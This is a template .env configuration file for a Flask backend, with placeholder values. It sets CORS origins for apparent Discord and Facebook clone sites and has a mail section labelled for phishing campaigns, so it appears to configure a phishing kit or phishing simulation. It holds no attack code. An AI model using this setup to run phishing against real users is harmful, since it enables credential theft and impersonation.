# Production Environment Configuration
# Copy this file to .env and fill in your actual values

# Flask Configuration
FLASK_ENV=production
SECRET_KEY=your-super-secret-key-here-min-32-chars-long
SECURITY_PASSWORD_SALT=your-security-salt-here-min-32-chars

# Database Configuration (Replace with your actual database URL)
DATABASE_URL=postgresql://username:password@host:port/database

# CORS Configuration (Update with your actual clone domains)
CORS_ORIGINS=https://discord-clone-yourproject.vercel.app,https://facebook-clone-yourproject.vercel.app

# Email Configuration for Phishing Campaigns
MAIL_SERVER=smtp.gmail.com
MAIL_PORT=587
MAIL_USERNAME=your-email@gmail.com
MAIL_PASSWORD=your-app-password
MAIL_USE_TLS=True
ADMIN_EMAIL=your-admin@email.com

# Redis Configuration (for rate limiting and caching)
REDIS_URL=redis://default:password@host:port

# OAuth Configuration (if using Google login)
GOOGLE_CLIENT_ID=your-google-client-id
GOOGLE_CLIENT_SECRET=your-google-client-secret
GOOGLE_OAUTH_REDIRECT_URI=https://your-backend-domain.com/oauth/google/callback

# Security Settings
SESSION_COOKIE_SECURE=True
SESSION_COOKIE_HTTPONLY=True
SESSION_COOKIE_SAMESITE=Lax 